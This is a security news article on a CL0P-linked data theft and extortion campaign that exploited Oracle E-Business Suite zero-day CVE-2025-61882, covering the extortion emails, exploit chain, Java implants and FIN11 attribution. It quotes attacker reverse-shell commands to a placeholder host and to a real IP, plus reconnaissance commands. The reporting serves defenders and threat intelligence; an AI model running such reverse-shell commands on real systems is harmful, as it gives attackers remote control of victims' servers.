Google Threat Intelligence Group (GTIG) and Mandiant have jointly disclosed an extensive data theft and extortion campaign targeting Oracle E-Business Suite (EBS) environments, linked to threat actors claiming affiliation with the CL0P extortion brand.
The campaign, which began in late September 2025, has already impacted multiple organizations, leveraging what appears to be a previously unknown zero-day — CVE-2025-61882 — in Oracle EBS.
“Beginning Sept. 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant began tracking a new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand,” the researchers stated.
The operation kicked off when executives across multiple industries began receiving extortion emails claiming their Oracle EBS environments had been compromised and sensitive data stolen.
The threat actors — allegedly tied to CL0P — used a high-volume email campaign, sending messages from hundreds of compromised third-party accounts to lend legitimacy and evade spam filters.
“The actor began sending a high volume of emails to executives at numerous organizations, alleging the theft of sensitive data from the victims’ Oracle E-Business Suite (EBS) environments,” GTIG noted.
These emails referenced real file listings exfiltrated from victim systems, providing convincing proof of intrusion. Recipients were directed to contact [email protected] or [email protected], both addresses long associated with the CL0P data leak site (DLS).
“To substantiate their claims, the threat actor has provided legitimate file listings from victim EBS environments… The extortion emails have indicated that alleged victims can prevent the release of stolen data in exchange for payment,” the report explained.
As of publication, no victims from this Oracle-focused campaign have yet appeared on the CL0P leak site — a typical delay tactic that mirrors CL0P’s pattern in previous ransomware and data extortion campaigns.
The technical investigation revealed that the CL0P-linked attackers exploited Oracle EBS zero-days months before patches were available. GTIG and Mandiant traced the earliest exploitation to July 10, 2025, predating Oracle’s critical patch updates by several weeks.
“The threat actor(s) exploited what may be CVE-2025-61882 as a zero-day against Oracle EBS customers as early as Aug. 9, 2025, weeks before a patch was available, with additional suspicious activity dating back to July 10, 2025,” the report revealed.
Initial intrusions involved the /OA_HTML/configurator/UiServlet endpoint, where attackers used a combination of Server-Side Request Forgery (SSRF), CRLF injection, authentication bypass, and XSL template injection to achieve remote code execution (RCE).
The exploit flow involved executing commands such as:
bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1providing attackers with interactive shell access on compromised systems.
Mandiant observed partial overlap between this exploit and one later leaked in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.”
By mid-August, the threat actor shifted tactics, exploiting a in the SyncServlet component to perform unauthenticated RCE via malicious XSL templates stored in Oracle’s internal XDO_TEMPLATES_B database table.
The exploit chain used:
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG— a strong indicator of compromise.
Within these payloads, GTIG and Mandiant identified a sophisticated Java-based implant framework, comprising:
- GOLDVEIN.JAVA – a downloader that communicates with a C2 disguised as a “TLSv3.1” handshake and retrieves second-stage payloads.
- SAGEGIFT, SAGELEAF, and SAGEWAVE – modular Java servlets that establish persistent backdoors and deploy encrypted payloads.
“GTIG has identified at least two different chains of Java payloads embedded in the XSL payloads… GOLDVEIN.JAVA, a downloader… and SAGE* payloads that create a persistent filter for deploying additional Java payloads,” the report described.
Once inside, the attackers performed detailed reconnaissance using the EBS ‘applmgr’ account, executing system and network enumeration commands to map the environment.
Observed commands included:
cat /etc/hosts
df -h
ifconfig
netstat -an
/bin/bash -i >& /dev/tcp/200.107.207.26/53 0>&1Mandiant also noted bash subprocesses spawned by Java payloads, which are now considered key hunting artifacts for defenders.
“Child processes of any bash -i process launched by Java running as the EBS account ‘applmgr’ should be reviewed as part of hunting for threat actor commands,” analysts advised
While GTIG has not yet confirmed attribution, significant overlaps exist with historical FIN11 operations — the financially motivated group long associated with the CL0P ransomware and DLS infrastructure.
“The use of the CL0P extortion brand, including contact addresses that have been listed on the CL0P DLS since at least May 2025, is however notable,” GTIG stated.
The GOLDVEIN.JAVA downloader and GOLDTOMB backdoor observed in this campaign closely resemble malware used by UNC5936, a suspected FIN11 subcluster, during prior mass exploitations of Cleo MFT software in 2024.
“The post-exploitation tooling shows logical similarities to malware previously used in a suspected FIN11 campaign,” the report added.
Oracle has since released emergency patches (Oct. 4, 2025) addressing CVE-2025-61882, covering the UiServlet and SyncServlet .
- Over 2,000 organizations are impacted by the MOVEit hack
- CVE-2025-61882 (CVSS 9.8): Critical RCE Flaw in Oracle E-Business Suite
- Oracle EBS Zero-Day (CVE-2025-61882) Under Active RCE Exploitation by GRACEFUL SPIDER
- MOVEit Cyberattack Exposes 632K US Federal Employee Emails
- Google: Zero-Day Exploits Shift from Browsers to Enterprise Security Tools in 2024
